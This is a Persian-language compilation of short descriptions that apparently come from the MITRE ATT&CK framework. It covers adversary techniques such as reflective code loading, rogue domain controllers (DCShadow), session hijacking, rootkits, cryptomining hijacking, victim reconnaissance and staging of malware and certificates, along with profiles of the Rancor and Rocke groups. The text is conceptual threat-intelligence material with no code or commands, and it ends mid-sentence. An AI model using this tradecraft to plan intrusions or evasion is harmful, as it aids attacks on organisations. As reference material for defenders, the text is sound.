دشمنان ممکن است به طور بازتابی کد را در یک فرآیند بارگذاری کنند تا اجرای بارهای مخرب را پنهان کنند. بارگذاری انعکاسی شامل تخصیص و اجرای محموله‌ها مستقیماً در حافظه فرآیند است، به‌عنوان جایگزین ایجاد یک رشته یا فرآیندی که توسط یک مسیر فایل روی دیسک پشتیبانی می‌شود. بارهای بارگذاری شده به صورت بازتابی ممکن است به صورت باینری، فایل های ناشناس (فقط در RAM موجود) یا صرفاً حذف کدهای اجرایی بدون فایل (مثلاً: کد پوسته مستقل از موقعیت) کامپایل شوند. تزریق کد بازتابی بسیار شبیه به Process Injection است با این تفاوت که "تزریق" کد را به جای یک فرآیند جداگانه در حافظه خود فرآیندها بارگذاری می کند. بارگذاری انعکاسی ممکن است از تشخیص های مبتنی بر فرآیند دوری کند زیرا اجرای کد دلخواه ممکن است در یک فرآیند قانونی یا بدخیم پنهان شود. بارگذاری انعکاسی محموله‌ها مستقیماً در حافظه همچنین ممکن است از ایجاد فایل‌ها یا دیگر مصنوعات روی دیسک جلوگیری کند، در حالی که بدافزار را قادر می‌سازد تا این محموله‌ها را تا زمان اجرا رمزگذاری (یا به‌طور دیگری مبهم) نگه دارد.

دشمنان ممکن است یک Domain Controller برای فعال کردن دستکاری داده های Active Directory ثبت کنند. DCShadow ممکن است برای ایجاد یک Domain Controller (DC) سرکش استفاده شود. DCShadow روشی برای دستکاری داده های اکتیو دایرکتوری از جمله اشیاء و طرحواره ها با ثبت (یا استفاده مجدد از یک ثبت نام غیرفعال) و شبیه سازی رفتار یک DC است. پس از ثبت نام، یک DC سرکش ممکن است بتواند تغییرات را در زیرساخت AD برای هر شی دامنه، از جمله اعتبارنامه ها و کلیدها، تزریق و تکرار کند. ثبت یک DC سرکش شامل ایجاد یک سرور جدید و اشیاء nTDSDSA در پارتیشن پیکربندی طرحواره AD است که به امتیازات Administrator یا دامنه یا محلی برای ( DC) یا هش KRBTGT نیاز دارد. این تکنیک ممکن است ثبت سیستم و مانیتورهای امنیتی مانند اطلاعات امنیتی و محصولات مدیریت رویداد ( SIEM) را دور بزند (زیرا اقدامات انجام شده در یک DC سرکش ممکن است به این حسگرها گزارش نشود). این تکنیک همچنین ممکن است برای تغییر و حذف همانندسازی و سایر ابرداده‌های مرتبط برای جلوگیری از تحلیل پزشکی قانونی استفاده شود. همچنین ممکن است دشمنان از این تکنیک برای انجام SID-History Injection و/یا دستکاری اشیاء (AD) مانند حساب‌ها، لیست‌های کنترل دسترسی، طرح‌واره‌ها) برای ایجاد درهای پشتی برای Persistence استفاده کنند.

دشمنان ممکن است سعی کنند لیستی از سیستم های دیگر را با آدرس IP، نام میزبان یا شناسه منطقی دیگر در یک شبکه که ممکن است برای حرکت جانبی از سیستم فعلی استفاده شود، دریافت کنند. عملکرد می تواند در ابزارهای دسترسی از راه دور برای فعال کردن این کار وجود داشته باشد، اما ابزارهای موجود در سیستم عامل نیز می توانند از جمله Ping یا net view با استفاده از Net استفاده شوند. دشمنان همچنین ممکن است از فایل‌های میزبان محلی (مانند C:\Windows\System32\Drivers\etc\hosts یا /etc/hosts برای کشف نام میزبان به آدرس IP نگاشت سیستم‌های راه دور استفاده کنند.

دشمنان ممکن است جلسات قبلی را با سرویس های راه دور کنترل کنند تا به صورت جانبی در یک محیط حرکت کنند. کاربران ممکن است از اعتبارنامه های معتبر برای ورود به سرویسی استفاده کنند که به طور خاص برای پذیرش اتصالات راه دور طراحی شده است، مانند telnet، SSH و.RDP هنگامی که کاربر به یک سرویس وارد می شود، جلسه ای ایجاد می شود که به آنها اجازه می دهد تا تعامل مستمر با آن سرویس را حفظ کنند. دشمنان ممکن است این جلسات را برای انجام اقدامات در سیستم های راه دور هدایت کنند. ربودن جلسه سرویس از راه دور با استفاده از خدمات از راه دور متفاوت است زیرا به جای ایجاد یک جلسه جدید با استفاده از حساب های معتبر، یک جلسه موجود را ربوده است.

دشمنان ممکن است از حساب های معتبر برای ورود به سرویسی استفاده کنند که به طور خاص برای پذیرش اتصالات راه دور طراحی شده است، مانند telnet، SSH و .VNC سپس حریف ممکن است به عنوان کاربر وارد شده اقداماتی را انجام دهد. در یک محیط سازمانی، سرورها و ایستگاه های کاری را می توان در دامنه ها سازماندهی کرد. دامنه ها مدیریت هویت متمرکز را ارائه می دهند و به کاربران اجازه می دهند با استفاده از یک مجموعه از اعتبارنامه ها در کل شبکه وارد سیستم شوند. اگر یک حریف بتواند مجموعه ای از اعتبار دامنه معتبر را به دست آورد، می تواند با استفاده از پروتکل های دسترسی از راه دور مانند پوسته امن (SSH) یا پروتکل دسکتاپ راه دور (RDP) به بسیاری از ماشین های مختلف وارد شود. برنامه‌های کاربردی قانونی (مانند ابزارهای توسعه نرم‌افزار و سایر برنامه‌های اداری) ممکن است از Remote Services برای دسترسی به میزبان‌های راه دور استفاده کنند. به عنوان مثال، Apple Remote Desktop (ARD) در macOS یک نرم افزار بومی است که برای مدیریت از راه دور استفاده می شود. ARD از ترکیبی از پروتکل‌ها، از جمله VNC برای ارسال صفحه و کنترل بافرها و SSH برای انتقال امن فایل استفاده می‌کند. دشمنان می توانند از برنامه هایی مانند ARD برای به دست آوردن اجرای کد از راه دور و انجام حرکت جانبی سوء استفاده کنند. در نسخه‌های macOS قبل از 10.14، یک دشمن می‌تواند یک جلسه SSH را به یک جلسه ARD افزایش دهد که به دشمن امکان می‌دهد بدون تعامل کاربر، درخواست‌های (TCC) شفافیت، رضایت و کنترل) را بپذیرد و به داده‌ها دسترسی پیدا کند.

یک دشمن ممکن است از پشتیبانی قانونی دسکتاپ و نرم افزار دسترسی از راه دور، مانند Team Viewer، Go2Assist، LogMein، AmmyyAdmin و غیره برای ایجاد یک کانال فرمان و کنترل تعاملی برای هدف قرار دادن سیستم ها در شبکه استفاده کند. این خدمات معمولاً به عنوان نرم افزار پشتیبانی فنی قانونی استفاده می شوند و ممکن است توسط کنترل برنامه در یک محیط هدف مجاز باشند. ابزارهای دسترسی از راه دور مانند VNC، Ammyy و Teamviewer در مقایسه با سایر نرم افزارهای قانونی که معمولاً توسط دشمنان استفاده می شود، اغلب استفاده می شوند. ابزارهای دسترسی از راه دور ممکن است ایجاد شده و پس از سازش به عنوان کانال ارتباطی جایگزین برای دسترسی اضافی یا به عنوان راهی برای ایجاد یک جلسه دسکتاپ از راه دور تعاملی با سیستم مورد نظر استفاده شوند. آنها همچنین ممکن است به عنوان جزئی از بدافزار برای ایجاد یک اتصال معکوس یا اتصال برگشتی به یک سرویس یا سیستم کنترل شده توسط دشمن استفاده شوند. ابزارهای مدیریتی مانند TeamViewer توسط چندین گروه برای هدف قرار دادن موسسات در کشورهای مورد علاقه دولت روسیه و کمپین های جنایی استفاده شده است.

دشمنان ممکن است از روت کیت ها برای پنهان کردن وجود برنامه ها، فایل ها، اتصالات شبکه، سرویس ها، درایورها و سایر اجزای سیستم استفاده کنند. روت کیت ها برنامه هایی هستند که وجود بدافزار را با رهگیری/قلاب کردن و اصلاح فراخوانی های API سیستم عامل که اطلاعات سیستم را تامین می کنند، پنهان می کنند. قابلیت فعال‌سازی روت‌کیت‌ها یا روت‌کیت ممکن است در سطح کاربر یا هسته در سیستم‌عامل یا پایین‌تر باشد، که شامل Hypervisor، Master Boot Record یا Firmware سیستم می‌شود. روت‌کیت‌ها برای سیستم‌های Windows، Linux و Mac OS X دیده شده‌اند

دشمنان ممکن است از منابع سیستم های انتخاب شده برای حل مشکلات منابع فشرده استفاده کنند که ممکن است بر دسترسی سیستم و/یا سرویس میزبان تاثیر بگذارد. یکی از اهداف متداول Resource Hijacking اعتبارسنجی تراکنش‌های شبکه‌های ارزهای دیجیتال و کسب ارز مجازی است. دشمنان ممکن است منابع سیستم کافی را مصرف کنند تا تأثیر منفی بگذارند و/یا باعث شوند ماشین‌های آسیب‌دیده پاسخگو نباشند. سرورها و سیستم‌های مبتنی بر ابر به دلیل پتانسیل بالای منابع موجود، اهداف مشترکی هستند، اما سیستم‌های نقطه پایانی کاربر نیز ممکن است به خطر بیفتند و برای ربودن منابع و استخراج ارزهای دیجیتال مورد استفاده قرار گیرند. محیط‌های کانتینری نیز ممکن است به دلیل سهولت استقرار از طریق APIهای در معرض دید و پتانسیل مقیاس‌گذاری فعالیت‌های استخراج با استقرار یا به خطر انداختن چندین کانتینر در یک محیط یا خوشه مورد هدف قرار گیرند.به‌علاوه، برخی بدافزارهای استخراج ارز دیجیتال، فرآیندهای بدافزار رقیب را از بین می‌برند تا اطمینان حاصل کنند که برای منابع رقابت نمی‌کنند.

Rancor یک گروه تهدید است که کمپین های هدفمند را علیه منطقه جنوب شرق آسیا رهبری کرده است. Rancor از فریب های سیاسی استفاده می کند تا قربانیان را برای باز کردن اسناد مخرب ترغیب کند.

Rocke یک دشمن ظاهراً چینی زبان است که به نظر می رسد هدف اصلی او سرقت رمزنگاری یا سرقت منابع سیستم قربانی برای اهداف استخراج ارزهای دیجیتال است. نام Rocke از آدرس ایمیل""rocke@live.cn گرفته شده است که برای ایجاد کیف پولی که دارای رمزنگاری جمع آوری شده است، استفاده می شود. محققان همپوشانی هایی را بین راک و گروه جرایم سایبری آهن تشخیص داده اند، اگرچه این انتساب تأیید نشده است.

انعطاف‌پذیری سایبری فرآیندی است که نشان می‌دهد چگونه یک کسب‌وکار به تهدیدات سایبری پاسخ می‌دهد. در چشم‌انداز مدرن امروزی، کسب‌وکارها نه تنها نیاز به دفاع در برابر حملات دارند، بلکه باید برای مقابله با نقض‌های امنیتی موفق برنامه‌ریزی کنند.

تزریق SQL یک آسیب‌پذیری امنیتی وب است که به مهاجم اجازه می‌دهد با پرس و جوهایی که یک برنامه در پایگاه داده خود ایجاد می‌کند تداخل داشته باشد. به طور کلی به مهاجم اجازه می‌دهد داده‌هایی را که معمولاً قادر به بازیابی آنها نیست مشاهده کند.

دشمنان می‌توانند اطلاعات مربوط به قربانیان را از منابع بسته جستجو کرده و جمع‌آوری کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. اطلاعات مربوط به قربانیان ممکن است برای خرید از منابع خصوصی و پایگاه‌های داده، مانند اشتراک پولی در فیدهای اطلاعات فنی و اطلاعات تهدید در دسترس باشد. دشمنان همچنین ممکن است اطلاعات را از منابع کمتر معتبر مانند dark webیا بازارهای سیاه جرایم اینترنتی خریداری کنند. اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و/ یا دسترسی اولیه (به عنوان مثال: خدمات از راه دور خارجی) فراهم کند.

دشمنان ممکن است داده‌های خصوصی فروشندگان اطلاعات تهدید را برای اطلاعاتی که می‌توانند در طول هدف‌گیری مورد استفاده قرار دهند، جستجو کنند. فروشندگان اطلاعات تهدید ممکن است فیدهای پولی یا پورتال‌هایی ارائه دهند که داده‌های بیشتری از آنچه به طور عمومی گزارش شده است ارائه دهند. اگرچه ممکن است جزئیات حساس (مانند نام مشتری و سایر شناسه‌ها) اصلاح شود، این اطلاعات ممکن است حاوی روندهایی در مورد نقض‌هایی مانند صنایع هدف، ادعاهای انتساب و اقدامات متقابل موفق / TTP باشد. دشمنان ممکن است در داده‌های فروشنده اطلاعات تهدید خصوصی جستجو کنند تا اطلاعات قابل اجرا را جمع‌آوری کنند. عوامل تهدید ممکن است به دنبال اطلاعات/شاخص‌هایی باشند که در مورد کمپین‌های خود و همچنین مواردی که توسط دیگر دشمنان انجام می‌شوند و ممکن است با صنایع هدف، قابلیت‌ها/اهداف، یا سایر نگرانی‌های عملیاتی آنها هماهنگ باشد، گردآوری شده‌اند.

دشمنان ممکن است پایگاه‌های اطلاعاتی فنی موجود را که برای قربانیان قابل استفاده است در حین هدف‌گیری جستجو کنند. اطلاعات مربوط به قربانیان ممکن است در پایگاه‌های داده و مخازن آنلاین مانند ثبت دامنه‌ها/گواهینامه‌ها و همچنین مجموعه‌های عمومی داده‌های شبکه/ مصنوعات جمع‌آوری شده از ترافیک و/ یا اسکن‌ها موجود باشد. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در وب سایت‌ها/دامنه‌های باز) ، ایجاد منابع عملیاتی (مانند: کسب زیرساخت یا زیرساخت سازش) و/ یا دسترسی اولیه (مانند: خدمات از راه دور خارجی) نشان دهد.

دشمنان ممکن است داده‌هایDNSرا برای اطلاعاتی در مورد قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. اطلاعات DNSممکن است شامل جزئیات مختلفی از جمله سرورهای نام ثبت شده و همچنین سوابقی باشد که آدرس‌دهی زیر دامنه‌های هدف، سرورهای ایمیل و سایر میزبان‌ها را مشخص می‌کند. دشمنان ممکن است داده‌های DNSرا برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می‌توانند مستقیماً از سرورهای نام سازمان مورد نظر پرس و جو کنند، یا از طریق مخازن متمرکز پاسخ‌های پرس و جوی DNS ثبت‌شده (معروف به DNSغیرفعال) جستجو کنند. دشمنان همچنین ممکن است پیکربندی/نشت‌های نادرست DNSرا که اطلاعات مربوط به شبکه‌های داخلی را فاش می‌کند، جستجو کرده و مورد هدف قرار دهند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً: وب‌سایت‌های متعلق به قربانی جستجو یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: زیرساخت‌های زیرساخت یا سازش) و/یا دسترسی اولیه (مثلاً: خارجی) را نشان دهد. خدمات از راه دور یا رابطه مورد اعتماد).

دشمنان ممکن است داده های عمومی WHOISرا برای اطلاعاتی در مورد قربانیان جستجو کنند که می‌تواند در طول هدف‌گیری مورد استفاده قرار گیرد. داده‌های WHOISتوسط ثبت‌های اینترنتی منطقه‌ای (RIRکه مسئول تخصیص منابع اینترنتی مانند نام دامنه هستند، ذخیره می‌شوند. هرکسی می‌تواند از سرورهای WHOIS اطلاعات مربوط به یک دامنه ثبت‌شده، مانند بلوک‌های IP اختصاص‌یافته، اطلاعات تماس و سرورهای نام DNS را جستجو کند. دشمنان ممکن است داده‌های WHOIS را برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می‌توانند از منابع آنلاین یا ابزارهای خط فرمان برای غارت داده‌های WHOISبرای کسب اطلاعات در مورد قربانیان احتمالی استفاده کنند. اطلاعات حاصل از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً اسکن فعال یا فیشینگ برای اطلاعات)، ایجاد منابع عملیاتی (مثلاً زیرساخت‌های زیرساخت یا سازش) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی یا رابطه معتمد) نشان دهد. ).

دشمنان ممکن است داده‌های گواهی دیجیتال عمومی را برای اطلاعاتی درباره قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. گواهی‌های دیجیتال توسط یک مرجع صدور گواهی (CA) به منظور تأیید رمزنگاری منشأ محتوای امضا شده صادر می‌شوند. این گواهی‌ها، مانند گواهی‌هایی که برای ترافیک وب رمزگذاری‌شده ارتباطات (HTTPS SSL/TLS)استفاده می‌شوند، حاوی اطلاعاتی درباره سازمان ثبت‌شده مانند نام و مکان هستند. دشمنان ممکن است داده‌های گواهی دیجیتال را برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می‌توانند از منابع آنلاین و ابزارهای جستجو برای جمع‌آوری اطلاعات در مورد گواهی‌ها استفاده کنند. داده‌های گواهی دیجیتال ممکن است از مصنوعات امضا شده توسط سازمان نیز در دسترس باشد (مثلاً گواهی‌های استفاده شده از ترافیک وب رمزگذاری شده با محتوا ارائه می‌شوند). اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً اسکن فعال یا فیشینگ برای اطلاعات)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا به دست آوردن قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی یا رابطه مورد اعتماد) نشان دهد.

دشمنان ممکن است در پایگاه‌های اطلاعاتی اسکن عمومی برای اطلاعاتی درباره قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. سرویس‌های آنلاین مختلف به طور مداوم نتایج اسکن‌ها/بررسی‌های اینترنتی را منتشر می‌کنند و اغلب اطلاعاتی مانند آدرس‌های IP فعال، نام میزبان، پورت‌های باز، گواهی‌ها و حتی بنرهای سرور را جمع‌آوری می‌کنند. دشمنان ممکن است پایگاه‌های داده را برای جمع‌آوری اطلاعات عملی جستجو کنند. عوامل تهدید می توانند از منابع آنلاین و ابزارهای جستجو برای جمع آوری اطلاعات از این خدمات استفاده کنند. دشمنان ممکن است به دنبال اطلاعاتی در مورد اهداف قبلاً شناسایی شده خود باشند یا از این مجموعه داده‌ها برای کشف فرصت‌هایی برای نقض موفق استفاده کنند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً اسکن فعال یا جستجو در وب‌سایت‌ها/دامنه‌های باز)، ایجاد منابع عملیاتی (مثلاً: توسعه قابلیت‌ها یا به دست آوردن قابلیت‌ها) و/یا دسترسی اولیه (مثلاً: خدمات از راه دور خارجی یا بهره برداری از برنامه عمومی).

دشمنان ممکن است وب سایت‌ها و یا دامنه‌های آزاد موجود برای اطلاعات مربوط به قربانیان را که می‌توانند در هنگام هدف‌گیری استفاده شوند جستجو کنند. اطلاعات مربوط به قربانیان ممکن است در سایت‌های مختلف آنلاین، مانند رسانه‌های اجتماعی، سایت‌های جدید، یا کسانی که اطلاعات مربوط به فعالیت‌های تجاری مانند استخدام یا قراردادهای درخواست شده/ پاداش را در اختیار دارند، ارائه دهند. بسته به اطلاعاتی که می‌خواهند جمع‌آوری کنند، دشمنان ممکن است در سایت‌های مختلف آنلاین جستجو کنند. اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در پایگاه های اطلاعات فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: ایجاد حساب‌ها) و یا دسترسی اولیه (مانند: خدمات از راه دور خارجی یا فیشینگ)فراهم کنند.

دشمنان ممکن است در رسانه‌های اجتماعی اطلاعاتی در مورد قربانیان جستجو کنند که می‌تواند در هنگام هدف‌گیری مورد استفاده قرار گیرد. سایت‌های رسانه‌های اجتماعی ممکن است حاوی اطلاعات مختلفی درباره یک سازمان قربانی باشند، مانند اطلاعیه‌های تجاری و همچنین اطلاعاتی درباره نقش‌ها، مکان‌ها و علایق کارکنان. دشمنان بسته به اطلاعاتی که به دنبال جمع‌آوری آن هستند ممکن است در سایت‌های رسانه‌های اجتماعی مختلف جستجو کنند. عاملان تهدید ممکن است به طور منفعلانه داده‌ها را از این سایت‌ها جمع‌آوری کنند، و همچنین از اطلاعات جمع‌آوری‌شده برای ایجاد نمایه‌ها/گروه‌های جعلی استفاده کنند تا قربانیان را برای افشای اطلاعات خاص (به عنوان مثال سرویسSpearphishing وادار کنند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مثلاً فیشینگ برای اطلاعات یا جستجو در پایگاه‌های اطلاعات فنی باز)، ایجاد منابع عملیاتی (مثلاً: ایجاد حساب‌ها یا حساب‌های در معرض خطر) و/یا دسترسی اولیه (مثلاً: Spearphishing از طریق سرویس) نشان دهد.

دشمنان ممکن است از موتورهای جستجو برای جمع‌آوری اطلاعات در مورد قربانیان استفاده کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. خدمات موتور جستجوی معمولی، سایت‌های آنلاین را برای فهرست‌بندی متن می‌خزند و ممکن است نحو تخصصی را برای جستجوی کلمات کلیدی خاص یا انواع خاصی از محتوا (به عنوان مثال انواع فایل) در اختیار کاربران قرار دهد. دشمنان ممکن است بسته به اطلاعاتی که به دنبال جمع آوری آن هستند، پرس و جوهای مختلف موتور جستجو را ایجاد کنند. عوامل تهدید ممکن است از موتورهای جستجو برای جمع‌آوری اطلاعات عمومی در مورد قربانیان استفاده کنند، و همچنین از پرس و جوهای تخصصی برای جستجوی نشت اطلاعات حساس مانند جزئیات شبکه یا اعتبارنامه استفاده کنند. اطلاعات این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی نشان دهد.

دشمنان ممکن است وب‌سایت‌های متعلق به قربانی را برای اطلاعاتی که می‌تواند در هنگام هدف‌گیری استفاده شود جستجو کنند. وب‌سایت‌های متعلق به قربانیان ممکن است شامل جزئیات مختلفی از جمله نام بخش‌/ بخش‌ها، مکان‌های فیزیکی و اطلاعات مربوط به کارکنان اصلی مانند نام‌ها، نقش‌ها و اطلاعات تماس (مانند آدرس‌های ایمیل) باشد. این سایت‌ها همچنین ممکن است دارای جزئیاتی باشند که عملیات و روابط تجاری را برجسته می‌کند. دشمنان ممکن است برای جمع‌آوری اطلاعات قابل اجرا، وب سایت‌های متعلق به قربانیان را جستجو کنند. اطلاعات از این منابع ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (مانند: فیشینگ برای اطلاعات یا جستجو در پایگاه‌های اطلاعات فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: ایجاد حساب‌ها) و یا دسترسی اولیه (به عنوان مثال: رابطه مورد اعتماد یا فیشینگ) نشان دهد.

دشمنان ممکن است بلوک‌های IP قربانی را برای جمع‌آوری اطلاعاتی که می‌تواند در هنگام هدف‌گیری استفاده شود، اسکن کنند آدرس‌های IP عمومی ممکن است به صورت بلوک یا طیف وسیعی از آدرس‌های متوالی به سازمان‌ها اختصاص داده شود، مانند آدرس‌های IP که به طور فعال در حال استفاده هستند و همچنین اطلاعات دقیق‌تر در مورد میزبان‌هایی که این آدرس‌ها را اختصاص داده‌اند. اسکن‌ها ممکن است از پینگ‌های ساده (درخواست‌ها و پاسخ‌های (ICMP)گرفته تا اسکن‌های ظریف‌تر که ممکن است نرم افزار/ نسخه میزبان را از طریق بنرهای سرور یا دیگر آثار شبکه نشان دهد. اطلاعات حاصل از این اسکن‌ها ممکن است فرصت‌هایی را برای سایر اشکال شناسایی (به عنوان مثال: جستجو در وب سایت‌ها / دامنه‌های باز یا جستجو در پایگاه‌های فنی باز) ، ایجاد منابع عملیاتی (به عنوان مثال: توسعه قابلیت‌ها یا دستیابی به قابلیت‌ها) و یا دسترسی اولیه (مانند: کنترل از راه دور خارجی)

دشمنان می‌توانند قابلیت‌هایی را آپلود، نصب کنند، یا به‌طور دیگری راه‌اندازی کنند که می‌تواند در طول هدف‌گیری استفاده شود. برای پشتیبانی از عملیات خود، یک دشمن ممکن است نیاز داشته باشد قابلیت‌هایی را که توسعه داده است یا به دست آورده است و در زیرساخت‌های تحت کنترل خود قرار دهد. این قابلیت‌ها ممکن است روی زیرساخت‌هایی که قبلاً توسط حریف خریداری یا اجاره شده است یا به‌طور دیگری توسط آنها در معرض خطر قرار گرفته است، اجرا شود. قابلیت‌ها همچنین می‌توانند در سرویس‌های وب، مانند GitHub یا Pastebin، اجرا شوند. مرحله‌بندی قابلیت‌ها می‌تواند به دشمن در تعدادی از رفتارهای دسترسی اولیه و پس از سازش کمک کند، از جمله: مرحله بندی منابع وب لازم برای اجرای Drive-by Compromise زمانی که کاربر در یک سایت مرور می‌کند. مرحله‌بندی منابع وب برای هدف پیوند برای استفاده با spearphishing. آپلود بدافزار یا ابزار در مکانی قابل دسترسی برای شبکه قربانی برای فعال کردن Ingress Tool Transfer نصب یک گواهینامه SSL/TLS که قبلاً به دست آورده‌اید تا از آن برای رمزگذاری دستورات و کنترل ترافیک استفاده کنید (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب).

دشمنان ممکن است بدافزار را در زیرساخت‌های شخص ثالث یا تحت کنترل دشمن آپلود کنند تا در هنگام هدف‌گیری در دسترس قرار گیرند. نرم‌افزارهای مخرب می‌توانند شامل payloads،droppers، ابزارهای post-compromise،backdoorها و انواع محتوای مخرب دیگر باشند. دشمنان ممکن است بدافزار را برای پشتیبانی از عملیات خود آپلود کنند، مانند در دسترس قرار دادن یک محموله برای شبکه قربانی برای فعال کردن Ingress Tool Transfer با قرار دادن آن در یک وب سرور قابل دسترسی به اینترنت. بدافزار ممکن است روی زیرساخت‌هایی قرار گیرد که قبلاً توسط دشمن خریداری/اجاره شده است (Acquire Infrastructure) یا به‌طور دیگری توسط آن‌ها به خطر افتاده است. Compromise Infrastructure بدافزار همچنین می‌تواند در سرویس‌های وب مانند GitHub یا Pastebin اجرا شود. دشمنان ممکن است فایل‌های پشتیبان، مانند باینری‌های برنامه، تصاویر ماشین مجازی، یا تصاویر کانتینر را در فروشگاه‌ها یا مخازن نرم‌افزار شخص ثالث (مانند GitHub، CNET، AWS Community AMI، Docker Hub) آپلود کنند. در صورت برخورد تصادفی، قربانیان می‌توانند مستقیماً این فایل‌های درپشتی را از طریق User Execution دانلود یا نصب کنند. پنهان کردن ممکن است احتمال اجرای اشتباه کاربران این فایل‌ها را افزایش دهد.

دشمنان ممکن است ابزارهایی را در زیرساخت‌های شخص ثالث یا تحت کنترل دشمن آپلود کنند تا در هنگام هدف‌گیری به آن دسترسی داشته باشند. ابزارها می توانند منبع باز یا بسته، رایگان یا تجاری باشند. ابزارها را می توان برای اهداف مخرب توسط دشمن استفاده کرد، اما (برخلاف بدافزار) برای آن اهداف مثلاً PsExecدر نظر گرفته نشده بود. دشمنان ممکن است ابزارهایی را برای پشتیبانی از عملیات خود آپلود کنند، مانند در دسترس قرار دادن ابزاری برای شبکه قربانی برای فعال کردن انتقال ابزار Ingress با قرار دادن آن در یک وب سرور قابل دسترسی به اینترنت. ابزارها ممکن است روی زیرساخت‌هایی قرار داده شوند که قبلاً توسط دشمن خریداری/اجاره شده‌اند (در زیرساخت به دست آوردن) یا در غیر این صورت توسط آنها (زیرساخت سازش) در معرض خطر قرار گرفته است. ابزارها همچنین می‌توانند در سرویس‌های وب، مانند مخزن GitHub کنترل شده توسط دشمن، اجرا شوند.دشمنان می‌توانند با دانلود مستقیم ماشین‌های قربانی آسیب‌دیده ابزار را از یک مکان میزبانی شخص ثالث (مثلاً مخزن GitHub کنترل‌شده غیر دشمن)، از جمله سایت میزبانی اصلی ابزار، از نیاز به آپلود ابزار اجتناب کنند.

دشمنان ممکن است گواهی‌های SSL/TLS را نصب کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. گواهینامه‌های SSL/TLS فایل‌هایی هستند که می‌توانند روی سرورها نصب شوند تا ارتباطات ایمن بین سیستم‌ها را فعال کنند. گواهی‌های دیجیتال شامل اطلاعات کلید، اطلاعات مربوط به هویت مالک آن و امضای دیجیتال نهادی است که صحت محتوای گواهی را تأیید کرده است. اگر امضا معتبر باشد و شخصی که گواهی را بررسی می‌کند به امضاکننده اعتماد کند، می‌داند که می‌تواند از آن کلید برای برقراری ارتباط امن با صاحب آن استفاده کند. گواهی‌ها را می‌توان در یک سرور آپلود کرد، سپس سرور را می‌توان پیکربندی کرد تا از گواهی برای فعال کردن ارتباط رمزگذاری شده با آن استفاده کند. دشمنان ممکن است گواهی‌های SSL/TLS را نصب کنند که می‌تواند برای پیشبرد عملیات‌هایشان استفاده شود، مانند رمزگذاری ترافیکC2 (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب) یا اعتبار دادن به یک سایت جمع‌آوری اعتبار. نصب گواهی‌های دیجیتال ممکن است برای تعدادی از انواع سرورها، از جمله سرورهای وب و سرورهای ایمیل، انجام شود. دشمنان می‌توانند گواهی‌های دیجیتالی را دریافت کنند یا گواهی‌هایی با امضای خود ایجاد کنند. سپس گواهی‌های دیجیتال را می‌توان بر روی زیرساخت‌های کنترل‌شده دشمن نصب کرد که ممکن است به‌دست‌آمده باشند (در زیرساخت‌ها) یا قبلاً در معرض خطر قرار گرفته باشند (زیرساخت سازش).

دشمنان ممکن است یک محیط عملیاتی برای آلوده کردن سیستم هایی که از یک وب سایت در طول دوره عادی مرور بازدید می کنند، آماده کنند. سیستم‌های نقطه پایانی ممکن است از طریق مرور در سایت‌های تحت کنترل دشمن، مانند Drive-by Compromise، به خطر بیفتند. در چنین مواردی، مرورگر وب کاربر معمولاً برای بهره برداری هدف قرار می گیرد (اغلب نیازی به تعامل اضافی با کاربر پس از فرود در سایت نیست)، اما دشمنان همچنین ممکن است وب سایت‌هایی را برای رفتار غیر بهره برداری مانند Application Access Token راه‌اندازی کنند. قبل از Drive-by Compromise، دشمنان باید منابع مورد نیاز برای ارائه این سوء استفاده را به کاربرانی که به سایت‌های کنترل شده توسط دشمن مرور می کنند، آماده کنند. محتوای Drive-by می‌تواند روی زیرساخت‌های کنترل‌شده توسط دشمن که به دست آمده است (Acquire Infrastructure) یا قبلاً در معرض خطر قرار گرفته است (Compromise Infrastructure) نمایش داده شود. دشمنان ممکن است محتوای وب مخرب مانند جاوا اسکریپت را به وب سایت ها آپلود یا تزریق کنند. این ممکن است به روش‌های مختلفی انجام شود، از جمله قرار دادن اسکریپت مخرب در صفحات وب یا سایر محتوای وب قابل کنترل توسط کاربر مانند پست‌های انجمن. دشمنان همچنین ممکن است تبلیغات اینترنتی مخرب ایجاد کنند و از طریق ارائه دهندگان تبلیغات قانونی فضای تبلیغاتی را در یک وب سایت خریداری کنند. علاوه بر صحنه‌سازی محتوا برای سوء استفاده از مرورگر وب کاربر، دشمنان همچنین ممکن است محتوای برنامه‌نویسی را برای نمایه مرورگر کاربر (مانند اطلاعات جمع‌آوری میزبان قربانی) برای اطمینان از آسیب‌پذیر بودن آن قبل از تلاش برای بهره‌برداری آماده کنند.وب‌سایت‌هایی که توسط یک دشمن در معرض خطر قرار می‌گیرند و از آنها برای اجرای 